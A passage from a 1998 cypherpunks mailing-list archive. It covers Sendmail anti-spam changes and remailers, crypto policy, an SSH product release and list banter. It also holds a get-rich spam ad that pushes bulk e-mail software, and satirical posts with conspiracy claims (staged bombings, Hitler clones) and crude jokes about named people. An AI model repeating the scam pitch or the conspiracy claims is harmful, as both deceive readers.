that the FBI has heretofore vaunted.

Listen in by RealAudio:

   http://www.computerprivacy.org/archive/03171998-1/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RDonnovan@hotmail.com
Date: Tue, 17 Mar 1998 11:47:46 -0800 (PST)
Subject: VIABLE PRODUCT, VIABLE OPPORTUNITY
Message-ID: <199803171947.LAA14002@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


Every Day Cash Plan

You OWN the copyrights to the program!

You sell the program for any amount you wish

You are not part of any company, downline or MLM

One time fee- $20

Once you buy, I don't forget you- the program includes
 my support BBS. Any questions or difficulties you encounter,
 you contact me personally.

First question you are likely to ask- is this "junk mail?"
Read on to see why it is not another "$3000 in 5 minutes" scam.

----FREE----FREE----FREE----FREE----
REGISTERED version of NetContact
     Retails for $300 and up
This bulk E-mail software will EXPLODE your business
----FREE----FREE----FREE----FREE----


That is all I do! I earn $140,  $200, even $250 a day mailing out
the exact same sales letter! There is absolutely no catch or crazy
gimmick involved here, I promise you. This has nothing to do with
any order-based envelope stuffing program, illegal chain-letter scam
or worthless multi-level scheme!

Why does it work? You OWN the rights, and are free to do with the
program as you please. You keep EVERYTHING you make. No boss, no
downline. Owning copyrights to any information is a valuable
commodity- this is why you will receive around a 50% response rate
on your ads.

There is not an easier way to make $140 a day than this- if you
would like to gain financial independence and success, listen up...

I tried every moneymaking plan under the sun. After a couple years
of constant attempts at striking it rich, I had done nothing but
strike out.

I tried multi-level marketing... I failed!
I tried chain letters... They failed me!
I tried envelope stuffing... Ridiculous!

I figured I could afford the $30 or $40 for each of the programs I
tried; until I realized not only does that build up, but I was making
no money in the mean time. Needless to say, living with no positive
income quickly equals debt.

Luckily a friend informed me of this program, which turned my
finances around. It has come to replace the career I was working
towards, simply because I make better money in very little time-
leaving me time for more important things, like my family.

Here is what my 3 diskette program includes:

1) NetContact bulk mail software- REGISTERED
2) Master copies of my Special Sales Letters that
     make $140 per day
3) Complete business startup guides
4) Complete instructions and internet access to our secret website

As you can see, for only $20, you are getting a complete business
system with all the support you need! In the past I have licensed
this system for $49.95. Available only for Windows95 and NT.

cut here____________________________________________

Please rush me your Every-Day Cash Plan!!
Enclosed is the $20 dollar cost.

Send $20 cash or check to: 	HyperReal
				Box 136
				2051 Richmond Road Suite 125
				Lexington, KY 40502

Make checks or money orders payable to HyperReal
				
				
Name_________________________________________________

Address_______________________________________________

City__________________________________________________

State/Province______________ Zip/Postal code_______________

Country if other than U.S._________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Tue, 17 Mar 1998 08:59:13 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: Will New Sendmail Block Remailers?
In-Reply-To: <1.5.4.32.19980317141322.006c25cc@pop.pipeline.com>
Message-ID: <Pine.GSO.3.96.980317115554.5195B-100000@pawn.michonline.com>
MIME-Version: 1.0
Content-Type: text/plain


> Markoff in the NYT reports today on the release of a new 
> Sendmail upgrade by author Eric Allman that will block 
> spam by checking the legitimacy of the originating address 
> before delivery.
> 
> The report claims that spam is up to 10% of e-mail worldwide,
> And that Sendmail is used on 75% of the computers that route 
> e-mail, all of which are being fitted with the new program.
> 
> What are the chances that this will affect remailers or other 
> means of eternal anonymity?

As long as this feature isn't turned on, on the remailers, not at all.
All the remailers use a replyable e-mail as the from field, they ust dumpe
anything e-mail to that, so if Sendmail goes out and does a VRFY on an
e-mail, it'll work, but not mean a heck of a lot..

All it really does is force spammers to search for someone's real address
to spoof and harass.  (They can just scan usenet, and pick on random
people if they want..)

Ryan Anderson - Alpha Geek
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9

"With this word of power, I cast thy soul into the void: (void)soul"

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cy Borg <cb@dev.null>
Date: Tue, 17 Mar 1998 12:09:16 -0800 (PST)
To: bill payne <billp@nmol.com>
Subject: Re: BIOS, FBI/ERF, Barbara Boxer,
In-Reply-To: <350E871B.2E74@nmol.com>
Message-ID: <350EF165.3762@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


Subject: Prologue 7/0 -- SPACE ALIENS HIDE MY DRUGS
From: TruthMonger <tm@dev.null>
Organization: "It's not FUD until *I* say it's FUD!"
To: cypherpunks@toad.com
CC: hoffmeyer@mermaid.molbio.ku.dk

Prologue 7/0 -- SPACE ALIENS HIDE MY DRUGS
------------------------------------------

Bureau42 wrote:
The unifying presence of CJ Parker seems to have disappeared, and the
Circle of Eunuchs is in chaos. This is what's left - the cryptic
saga, "Space Aliens Hide My Drugs!" I can only wonder what, if anything,
this malarchy means. But it's occasionally amusing if nothing else.

  the bureau42 staff

-----

Subject: A.Word.A.Day--chaos
Date: Mon, 16 Mar 1998 00:07:19 -0500
From: Wordsmith <wsmith@wordsmith.org>
To: linguaphile@wordsmith.org

chaos (KAY-os) noun
   1. A condition or place of great disorder or confusion.
   2. A disorderly mass; a jumble.
   3. Often Chaos. The disordered state of unformed matter and infinite
      space supposed in some cosmogonic views to have existed before the
      ordered universe.
   4. Obsolete. An abyss; a chasm.
[Middle English, formless primordial space, from Latin, from Greek
khaos.] 
 
   "But chaos is a condition of creativity, says Zarathustra - `one 
   must have chaos in one, to give birth to a dancing star.'"
   Nietzsche, Friedrich Wilhelm, Thus Spake Zarathustra: Part 1.

-----

[Note from the Editor: CJ Parker, having had previous experience in
 playing a woman's role during his stint on 'Baywatch', has gone to
 ground recently, as have many other members of the Circle of Eunuchs,
 by re-entering the World of Myth, replacing the Parker woman in the
 TV series, 'The Pretender' (who died in a plane crash while giving
 Ron Brown the details of BadBillyC's sexual assault on her).
 This rather bizarre chain of events was precipitated by a warning he
 received regarding the return of Adolf Hitler to power, using the
 same Dimlluminati (The lights are on, but nobody's home...) process
 which was used to sweep Ronnie RayGuns into power as the chief leader
 of the Freeh(ee-hee) World.
 Those who have noticed the stunning blitzkrieg assault of a small
 college basketball team, Valparaiso, on their opponents in the NCAA
 tournament currently taking place, may have noticed the striking
 resemblance of Bryce Drew, their star player, to the child actor
 who was the main protagonist in the TV series, 'The Wonder Years.'
 This is no coincidence--they are, in fact, one and the same person.
 The diabolical process used to implant a respectable, patriotic image
 of Ronnie RayGuns in the mind of the American people, through the
 then-developing psychedelic opiate of Cinema/Television, is, in the
 present case, being extended to reinforce the image of the 'Wonder
 Boy' in an increasingly global environment, by extending the actor/
 image persona into the sports arena--beginning at the college level.
 ("Win one for the Gipper...")
 The 'miracle shot' by Bryce Drew to lift the obscure college team to
 victory over Mississippi was a staged event which required several
 'takes' before being successfully captured on film. The scene was
 shot in the same TV studio in which the original 'moon landing' was
 filmed. The same choreographers were used who worked on The Oklahoma
 City Players last major production, the bombing of the Murrah Federal
 Building.
 When asked for comment, a former Detroit Piston player who is now
 the owner of an NBA franchise, but wishes to remain anonymous, said,
 "If Bryce Drew and Ronald Reagan were black, they would have been
 just another pair of average actors."
 Knowledgeable individuals following the Reptilian Nazi conspiracy
 to emerge from their secret bunkers underneath the AdamAntArctic
 and Mule Shoe, Texas, recognize this quote as proof that the next
 step in this diabolical plot is to put the third clone (TV child-
 actor, college basketball player...-->...) of Adolf Hitler into
 place as the new 'white hope', replacing Larry Byrd as a member of
 the Boston Celtics. This shrewd move will help draw together, into
 a common cause, Fundamentalist Christians, White Supremacists, and
 East-coast factions of the Irish Republican Army.
 Circle of Eunuchs members attempting to expose this grand scheme of
 the Evil One have come under heavy attack recently. Dr. Dimitri Vulis
 KOTM, who was thrown out of the only CoE meeting he attended, had
 his InterNet account pulled shortly after putting up web site images
 of Bryce Drew, of Drew's alleged 'coach/father' and of Adolf Hitler. 
 (Guess who Bryce *really* looks the most like...?)
 A forth clone of Hitler (rumored to be operating under the code name
 of 'Lucky Green' and involved in an incestuous relationship with his
 aunt, E. Christ--currently operating under the alias of Anne R. Christ)
 is being prepared, within the bowels of the crypto-community, to 
 emerge as the future leader of the New World Order--in the position of
 Information Monitor/Director of the United Statism of Mind.]
 
-----
Subject: Re: Freedom. (fwd)
From: Jim Choate <ravage@ssz.com>
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)

Forwarded message:
> From: Mark Rogaski <wendigo@ne-wendigo.jabberwock.org>
> Subject: Re: Freedom.
> Date: Sun, 15 Mar 1998 23:39:56 -0500 (EST)

> : > It's typical of prisoners that they begin to associate with their captors at some     > point. Eventualy there is no difference. Congratulations, you've reached that point.
> 
> Equating adaptability for guilt is a shaky bridge and not handled well by
> blanket judgements.

Actualy it's neither. It's a facet of human nature involved in the
survival
mechanism. Further, there is no judgement involved, it's an easily
verifiable quality of human psychology that prisoners begin to associate
with their captors after a short period.

What it is in this context is the recognition that prisoners of a
political
system will after a fashion begin to accept that system. Just look at
the
cry by many to return to the socialist system after the fall of the CCCP
in 
1990.
    ____________________________________________________________________
           Those who suppress freedom always do so in the name of
           law and order.
                                            John. V. Lindsay

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------

-----

As a consequence the search for a quantitative theory of evolution 
based at the genetic level, which has been such an obsession for 
neo-Darwinism ever since the work of Fisher, Haldane and Wright, has 
been misdirected. As Depew and Weber has expressed it 'natural 
selection at the level of individuals and the notion of fitness used 
to measure it, is itself poised on the edge of chaos' 
(Depew and Weber, 1995): 
'The fitness of various sorts of organisms is not necessarily, or even
probably, enhanced by superiority in a single trait... In fact, the 
emergence of the ability to take advantage in resource competitions of 
an indefinitely number of often infinitesimally small differences 
creates degrees of freedom, in both the technical and the ordinary 
senses, well beyond what can be achieved by merely chemical and 
physical systems. It also creates more variables and interactions 
among them than can be tracked. It is impossible, then, to reduce 
the components of fitness to any single language or system of 
variables' (ibid, 471).

The number of possible solutions for selection to scrutinise, and the 
subtlety of the communicational interactions, will tend to produce a 
no-win situation. As a result selection cannot really 'measure' the 
stakes of single players (individuals, demes, or species) in the game,
but it could still influence the choice of the game itself. 
Plays, not players, are selected for.

~Jesper Hoffmeyer
 Biosemiotics: Towards a New Synthesis in Biology
 European Journal for Semiotic Studies, Vol. 9 No. 2, 1997, pp 355-376.

-----
  It was the work of Jesper Hoffmeyer, in the field of Biosemiotics,
which led to the development of an artificial life/intelligence form
capable of self-development/evolution, at Sandia Laboratories--by
Reptilian Nazis.
  Their Cyborg technology had reached the point where it could finally
be mass-produced when Bill Payne, a Sandia-NISTA employee, downloaded
all the relevant technological files to a fellow Circle of Eunuchs
member operating clandestinely within the bowels of a secret government
laboratory (code-named 'Lost Alamo' by CoE psychophants).
  Although the Reptilian Nazis sent the Shadow back in time to 
eliminate the threat of the Circle of Eunuchs, by eliminating the
Author in a sleazy motel room in southern Saskatchewan, the Circle of
Eunuchs, taking advantage of the Trei Transponder technology developed
by the CypherPunks, made contact with the resident of a Home For The
Criminally Insane, in the same era, and used Biosemiotic theory to
transfer biological communication-information to a digital implant
he had received as part of a government experiment designed to control
the minds of the members of the CypherPunks Distributed Remailer lists.
  The resulting events have long been the basis for certain mythologies
concerning the Mythical Circle of Eunuchs, with the basic theme of
the CoE reality being mirrored from time to time in the mythology-
substitute of the era--Literature/Cinema/Television. (e.g. - Animal
Farm, 1984, War of the Worlds, Terminator (I & II), X-Files, Pretender,
Millennium, Journey to the East, The Magus, etc.)

----

The Bureau42 statement, "The unifying presence of CJ Parker seems to 
have disappeared,  and the Circle of Eunuchs is in chaos." was an
alert to CoE members to pay special attention to a commincation
which ultimately came from a CoE collective known as 'WordSmith':
    "But chaos is a condition of creativity, says Zarathustra - `one 
   must have chaos in one, to give birth to a dancing star.'"
   Nietzsche, Friedrich Wilhelm, Thus Spake Zarathustra: Part 1.

  The issue of chaos/creativity versus order/statism has pitted the
Circle of Eunuchs against the New World Order on a battleground that
encompasses NWO Anti-Christ/Artificial-Intelligence against CoE
Anarchist/Biosemiotic-CodeWriting.
  It is a battle in which the meatspace Army of God forces must be
countered by cyberspace Army of Dog troops.

"DogMongers write biosemiotic code." 
~ Bubba Hughes

-----

  The InterNet is fast becoming the global battleground for control
of the future biosemiotic evolution, not only of humankind, but of
universal intelligence, itself.

-----

Darwin was right in seeing selection as the central process in animate 
nature, but for more than hundred years Darwinists have resisted 
taking the full consequence of this insight. It is now necessary to 
take this consequence and admit the obvious: That selective processes 
presupposes interpretations (with the implied possibility of 
misinterpretation). Thus, to the extent selection is a natural process,
semiosis is a natural process - semiosis goes on all the time and at 
all levels of the biosphere. It may be feared that such a position 
will put biology outside the safe range of natural science, since 
interpretation seems to presuppose the existence of some kind of 
subject-ness. This risk, however, must be confronted through a 
thorough analysis of the implications, rather than evaded by 
repression.

~Jesper Hoffmeyer
 Biosemiotics: Towards a New Synthesis in Biology
 European Journal for Semiotic Studies, Vol. 9 No. 2, 1997, pp 355-376.

-----

  The war between the forces of freedom and the forces of repression
takes place in many arenas.
  In the arena of expression of the life force, it is manifest in
the battle between the forces of free speech and the forces of
censorship.

  The evolution of the InterNet is the evolution of Biosemiotic
Information-Communication.

The term umwelt refers to the phenomenal worlds of organisms, the 
worlds around animals as they themselves perceive them. 
"Every action" wrote Uexkll "that consists of perception and operation
imprints its meaning on the meaningless object and thereby makes it 
into a subject-related meaning-carrier in the respective umwelt" 
(Uexkll, 1982 [1940])

  The Medium Is The Message
  Information Exchange Is The CornerStone Of Evolution
  Evolution Is The Creativity of Chaos Becoming Manifest

-----

The number of possible solutions for selection to scrutinise, and the 
subtlety of the communicational interactions, will tend to produce a 
no-win situation. As a result selection cannot really 'measure' the 
stakes of single players (individuals, demes, or species) in the game, 
but it could still influence the choice of the game itself. Plays, not
players, are selected for.

In the last decade the trend towards semiotisation of nature discussed 
here has manifested itself at still new levels. Thus, in evolutionary 
biology, neo-Darwinism has been seriously challenged by a set of ideas 
referred to as infodynamics (Brooks and Wiley, 1986; Weber, et al., 
1989; Weber and Depew, 1995; Goodwin, 1989; Salthe, 1993). 
Infodynamics in the words of Stanley Salthe 'subsumes thermodynamics 
and information theory, essentially animating the latter by means of 
the former' (Salthe, 1993, 6). The general idea as originally suggested
by Dan Brooks and Ed Wiley is that information capacity (disorder)
increases spontaneously in developing systems, being produced along 
with physical entropy as the system grows and differentiates. 
Since such self-organisation is a prevalent property of our universe, 
natural selection should not be seen as the dominating force of 
evolution, but rather as playing the more modest role of pruning down 
the novelty that is constantly and autonomously being generated by the
requirements of the second law of thermodynamics.

Prigogine got the Nobel-price for his work on the thermodynamics of 
irreversible systems and most importantly in this context he showed 
that in so-called dissipative structures, i.e. systems far from 
thermodynamic equilibrium, ordered states may sometimes arise
spontaneously out of disordered states. Our universe according to 
Prigogine is inherently creative. Due in large part to this
revolution in our understanding of thermodynamics modern cosmology 
now sees our world as a self-organising place, a view which has perhaps
most forcefully been unfolded in the recent work of Stuart Kauffman 
(Kauffman 1991, 1993).

~ Jesper Hoffmeyer

-----

  As CP-CoE neobyte Jim Choat points out, we become Sheeple who
blindly follow our captors through the operation of our inborn
survival mechanism.
"It's a facet of human nature involved in the survival
mechanism. Further, there is no judgement involved, it's an easily
verifiable quality of human psychology that prisoners begin to 
associate with their captors after a short period."

  The only hope for Netizens to resist becoming Digital Sheeple behind 
the ElectroMagnetic Curtain which the forces of censorship/repression
are striving to put in place is for each member of the coming Army
of Dog to mark their meatspace and cyberspace territory and refuse
to go gently into the night when the Oppressor attempts to scare
them into submission with a mountain of laws and regulations which
promise unjust persecution for imaginary offenses.
  A Global InterNet Army of individuals committed to freedom must
strive to create a maximum entropy within which the chaos of semiotic
evolution can break the digital chains which the Statist Oppressors
are seeking to use to bind and repress access to information, global
communication, free speech/expression, and the evolution of the
Universal Life Energy, itself.

-----

  Current CoE mythology indicates that CJ Parker, fleeing his safehouse
in Bienfait, Saskatchewan, after his dog Baby was shot by an FBI sniper
as the Canadian Mounties closed in on him to enforce a "Dog at large."
charge which was trumped up in an attempt to get him to inform on
other CoE and CypherPunks members, left behind a note to his wannabe
persecutors which indicated that he was willing to fight to the death,
in both meatspace and cyberspace, if his only alternative was to live
in a world where CypherBroads were required, by law, to wear panties.
(This bit of information originated with his nephew, Human Gus-Peter,
 and is thus viewed with skepticism by some of the more mature/aged/
 rotting members of the Circle of Eunuchs.)

----
Lock & Loll
Rock & Road 
Chop & Chop

ZenRacistMonger






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 17 Mar 1998 12:05:29 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: Local Law Oppose FBI on Crypto
In-Reply-To: <1.5.4.32.19980317163801.0071eac8@pop.pipeline.com>
Message-ID: <v03007800b1348413f525@[204.254.22.67]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:38 -0500 3/17/98, John Young wrote:
>A point made at Senator Ashcroft's crypto hearing going
>on now, made by James J. Fotis, of the Law Enforcement
>Alliance of America, is that many local police departments
>do not want the FBI and federal agencies snooping on them,
>thus, they oppose the FBI's stance on crippled crypto.

The LEAA is part of the Americans for Computer Privacy effort and was
listed as one of their member groups at the announcement earlier this
month...

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 17 Mar 1998 06:12:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199803171412.PAA17815@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


3/17/98

A note to Cypherpunks:

Today I was sent a missive ostensibly from Mr. Toto.

Following are the particulars:

[begin quote]

Return-Path: <toto@sk.sympatico.ca>
Received: from harrier.sasknet.sk.ca (harrier.sasknet.sk.ca 
[142.165.5.2]) by camel10.abraxis.com (8.8.5/8.8.5) with ESMTP id 
XAA02654 for <camcc@abraxis.com>; Mon, 16 Mar 1998 23:42:42 -0500 
(EST)
Received: from uymfdlvk (regnsk01d05020132.sk.sympatico.ca 
[142.165.24.84]) by harrier.sasknet.sk.ca (8.8.6/8.8.6) with SMTP 
id WAA21157;
Mon, 16 Mar 1998 22:40:54 -0600 (CST)
Message-ID: <350E1A48.6C00@sk.sympatico.ca>
Date: Mon, 16 Mar 1998 22:38:01 -0800
From: Toto <toto@sk.sympatico.ca>
Reply-To: toto@sk.sympatico.ca
To: Replay Anonymous remailer <remailer@REPLAY.COM>

[end quote]

For health reasons I removed myself from the list several months 
ago; now it appears the errors of my youth have returned to haunt 
me.

I had assumed either the RCMP, CIA, FBI, KGB, ASPCA, or some 
other local authority had plucked Toto from the Web.

Alas, this latest message, SAHMD -- Prologue 8/0, indicates the 
torment continues unless, of course, it is a forgery. But then, 
Mr. T. has been known to forge messages he has signed and send 
them direct with screwed up Anon: headers.

This must stop. Whom should I contact to complain about such 
harrassment?

My head is hurting again for the first time in months.

Alec






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 17 Mar 1998 06:37:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Must refrain from using a mind": A(h)OL's son
Message-ID: <199803171437.PAA21913@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Information Violation wrote:
> 
> from the Bienfait Rectal Examiner:
>    _________________________________________________________________
> 
> A(h)OL, a long, chubby dick with a thick mustache, has pleaded not
> present to two felony counts alleging possession of cryptographic material
> with the intention of ciphering or deciphering.
> 
> If convicted, he faces up to six lifetimess in prison.
> 
> He pleaded not present Wednesday and is free on his own recognizance,
> subject to some unusual conditions: that he obey authority, stay away
> from words, refrain from possessing or using a mind and get
> psychopathological torture.
> 
> Opening the back door of Jim Morrison's former home on a trimmed
> cul-de-sac, A(h)OL, his face reflecting anarchy for a few seconds,
> declined a donut and shut the door.
> 
> A(h)OL's attorney, Adrian Messenger, said the persecution's theory of
> reality was probably the result of 'bad acid.' His client, a
> childless bachelor, with two sons, "is a 47-year-old turd," he said. 
> "He's not a cryptographer. He stays stoned a lot, and he's a pretty 
> recessive pervert."
> 
> Adrian said A(h)OL "strikes me as an acutely illiterate guy who
> wouldn't hurt a word.  He hasn't got the social grace or skills of
> one who would try subtly to peek up a female cryptographer's skirt
> to see if she was wearing panties."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mia Westerholm <Mia.Westerholm@DataFellows.com>
Date: Tue, 17 Mar 1998 07:12:30 -0800 (PST)
To: Crypto-Press-Global@DataFellows.com
Subject: Data Fellows Lauches New Version of the Famous F-Secure SSH Products
Message-ID: <3.0.2.32.19980317160523.00c5fa18@smtp.DataFellows.com>
MIME-Version: 1.0
Content-Type: text/plain


Data Fellows Ltd.  Media Release

For immediate release
17 March 1998

DATA FELLOWS LAUNCHES NEW VERSIONS OF THE FAMOUS 
F-SECURE SSH PRODUCTS

The improved F-Secure SSH product family is a unique tool for secure remote
systems administration

ESPOO, FINLAND --- Data Fellows, a leading provider of Internet security
solutions, has launched new versions of its famous F-Secure SSH products.

F-Secure SSH Tunnel&Terminal and F-Secure SSH Server protect TCP/IP-based
terminal connections in UNIX, Windows and Macintosh environments. They
enable remote systems administrators and telecommuters to access corporate
networks via any Internet Service Provider without revealing system
passwords and other secrets to possible eavesdroppers.

"In addition to providing secure login connections, F-Secure SSH Server
secures all remote systems administration tasks by providing secure tools
to replace the existing rsh, rlogin, rcp, rdist and telnet protocols," says
Mr. Olli Voima, Product Development Manager of F-Secure SSH.  "As a new
feature, the secure file transfer application offers an easy-to-use
graphical interface for the safe transfer of files."

F-Secure SSH Tunnel&Terminal and F-Secure SSH Server support the forwarding
of TCP/IP services like pop, smtp (used by e-mail software), http (used by
Web browsers), etc., or almost any other TCP/IP-based service.  The local
proxy server in F-Secure SSH Tunnel&Terminal listens for a socket on the
desired port and forwards the request and data over the secure channel.  It
then instructs the F-Secure SSH Server to make the connection to the
specified service on the remote machine. Automatic forwarding of the X11
Windowing System secures graphical applications.

F-Secure SSH products are based on the SSH protocol, an application level
security mechanism used in conjunction with Internet protocols.

"The SSH protocol is the most widely audited and standardized security
protocol in the world," says Mr. Voima. "Its strong end-user authentication
and encryption leave no room for security compromises. As a European
company, Data Fellows is not restricted by the US export regulations, and
has thus been able to make strong encryption available worldwide. F-Secure
SSH host authentication is based on 1024-bit RSA keys, and the secure
connections use 128-bit session keys."

In addition to being strongly secured, the F-Secure SSH products are easy
to use.  The single sign-on technology makes the handling of multiple
terminal sessions simple. 

Says Mr. Voima:  "Easy-to-use and strongly secured, F-Secure SSH is a truly
unique security solution for remote systems administration."

About Data Fellows:

Data Fellows is one of the world's leading developers of data security
products with offices in San Jose, California and Espoo, Finland. Its
groundbreaking 
F-Secure product family is a unique combination of globally available,
strong encryption and revolutionary anti-virus software.  The integrated
F-Secure product range provides a complete security solution for
enterprises, and includes file encryption and IPSec communication
encryption products, VPN gateways, SSH based secure remote management
software, and a full range of anti-virus products to workstations, servers
and gateways.  Data Fellows is also the developer of the award winning
F-PROT Professional anti-virus, now part of the dual scanning engine
concept of F-Secure Anti-Virus.   

Data Fellows is privately owned.  Since it was founded in 1988, its annual
net growth of net sales has been over 80%.  Data Fellows offers a worldwide
network of technical support, training and distribution in over 70 countries. 
Data Fellows belongs to an elite group of companies that have a triple-A
rating from Dun&Bradstreet.

For further information, please contact:

Mr. Olli Voima, Product Development Manager
Tel. +358 9 859 900, Fax. +358 9 8599 0599
E-Mail:  Olli.Voima@DataFellows.com

or  visit out website at
http:// www.DataFellows.com

ALSO, VISIT OUT BOOTH AT CEBIT98 (HALL 3, STAND B46)


Mia.Westerholm@DataFellows.com 
http://www.DataFellows.com

Data Fellows Ltd.
PL 24
FIN-02231 ESPOO, FINLAND
Tel. +358 9 859 900
Fax. +358 9 8599 0599




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Spectre <spectre@anthrax.net>
Date: Tue, 17 Mar 1998 13:27:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Software license detector vans
In-Reply-To: <B0000003768@hades.crmcom.com>
Message-ID: <B0000003781@hades.crmcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 13:15 3/17/98 , you wrote:

>Well, you don't have to cover *every* house, just *any* house. THe
>Brits have vans that roam around looking for unlisenced sattelite
>receivers, and it provides a pretty effective deterrant.

That works in that scenario, but you do have to monitor *every* house, and
continually, if you want to catch a software pirate.. in the satellite
scenario, they're just looking for a signal to see if it exists or not.  In
the M$ scheme, you'd have to get the license key and compare it against a
database to see if that license key was in use by anyone else at that exact
moment... it's not illegal to use multiple copies of the same piece of
software, it's just illegal to use them concurrently.


-The Spectre [SP4 w/ clam cluster]
-http://www.anthrax.net/cos
"The surest way to corrupt a youth is to instruct him to hold in higher
esteem those who think alike than those who think differently."
		-- Neitzsche, _The_Dawn_
PGP key available from servers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@dev.null>
Date: Tue, 17 Mar 1998 17:24:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Corporate Children
Message-ID: <350F3DCF.6718@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


[Bienfait Nutly News] IN A RIOTOUS, DRUNKEN ORGY AT THE COALDUST SALOON,
representatives of Canadian Funeral Home Association celebrated their
success in bribing enough Canadian officials, bureaucrats, politicians
and mobsters to pull off the advertising coupe of the century.
Beginning on April 19, 1998, at 9:02 a.m., Canadian funeral homes will
be able to bid on advertising space on the ceilings of maternity wards,
birthing rooms and infant care facilities across the nation.

Jealous of the recent success of soft-drink and liquor companies in
gaining a virtual stranglehold on the public school and college market,
the CFHA appealed to the North American Advertising Coalition for 
support, on the grounds that establishing a Cradle-to-Grave precedent
for access to the minds of the citizens would be good for the industry
as a whole.
Lou Armbuster, who engineered Smith & Wesson's successful bid for 
access to the prison advertising market, stated, "We are certain that
this will be a major step in preventing people from putting off dealing
with funeral arrangements until it is too late, leaving their relatives
vulnerable to unscrupulous operators during their period of grief."
When asked about the rumor that the "Vote Hoffa" ads appearing on
the sides of the majority of coffins recently was part of a pre-
arranged deal for Teamster Union support, Mr. Armbuster punched out
the lights of the reportwhore who asked the question.

PGP Inc., under fire recently for the fact that their latest version
of Corporate GAKware has a 'comment' line that defaults to "Louis
Freeh for President!", contends that it does not constitute free
political advertising, since the customer has the option to change it.
Nevertheless, PGP refuses to drop their lawsuit against the FrostBack
they consider responsible for hacking their system and altering their
source code so that new versions of PGP installed on Canadian systems
have a default comment line of "Cindy Cohn has a great ass!"

-----
The Bienfait Nutly News is in no way connected to the Left Nutly
News or the Right Nutly News. We prefer to remain in the middle,
in the tradition of our founder, Dick Richard.
-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian W. Buchanan" <brian@smarter.than.nu>
Date: Tue, 17 Mar 1998 19:47:41 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: Will New Sendmail Block Remailers?
In-Reply-To: <1.5.4.32.19980317141322.006c25cc@pop.pipeline.com>
Message-ID: <Pine.BSF.3.96.980317191646.264A-100000@thought.calbbs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Mar 1998, John Young wrote:

> 
> Markoff in the NYT reports today on the release of a new 
> Sendmail upgrade by author Eric Allman that will block 
> spam by checking the legitimacy of the originating address 
> before delivery.
> 
> The report claims that spam is up to 10% of e-mail worldwide,
> And that Sendmail is used on 75% of the computers that route 
> e-mail, all of which are being fitted with the new program.
> 
> What are the chances that this will affect remailers or other 
> means of eternal anonymity?

   I doubt it.  NYT is probably referring to the integration into the
sendmail package of rules that nix incoming mail with forged From headers,
e.g. "you.want.to@buy.this" and prevent unauthorized relaying.  Remailers
generally use a From header that includes their own legitimate domain, so
they likely won't be blocked.  However, while the anti-relay-hijacking
rules are useful (and LONG overdue), I see the the From-domain-validity
change as a Bad Thing, as it will encourage spammers to deliberately
choose existing domains to spoof in their From lines, leading to an
increase in the incidences of sites being subjected to fragmented
denial-of-service attacks, i.e. being mailbombed by the collective
complaints of all those shit-stupid AOLers who don't bother to read the
Received headers.  I've been lucky enough never to have been subjected to
one of those attacks, but from the sheer volume of complaints I once got
when a luser sent a MMF spam to USENET, I can sympathize with the victim
of a spoof.
   Yet another instance of "protection for the masses" actually providing
no real benefit and simultaneously negating the protection afforded to
those few who had previously used the defense.  A similar thing has
happened/is happening with the previously-useful "Comments: Authenticated
sender is" check for spam, which used to be nearly 95% effective at nixing
spam because most known spamming packages included the header, and only
one legitimate mailer did likewise, but was easy to make exceptions for
because it included an identifying X-Mailer header.

-- 
Brian Buchanan                                      brian@smarter.than.nu

Never believe that you know the whole story.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 17 Mar 1998 13:13:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP assimilated by NAI
Message-ID: <199803172112.WAA03178@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote: 
> No doubt. I offer the observation that only someone doing
> a favor for the government or someone operating from the
> totally mind-fucked perspective of modern mismanagement
> would invest good money to buy a company whose principal
> asset was its "good will" and proceed to completely trash
> that marketplace good will, abandon the world-famous
> name of product and company, and physically assimilate
> the hapless wage slaves working there by another group
> that represents the antithesis of what PGP stood for in
> the minds of virtually all who knew it, worldwide. How
> can this _possibly_ be a good business decision in and
> of itself? Occam's Razor: It isn't -- it's only good in
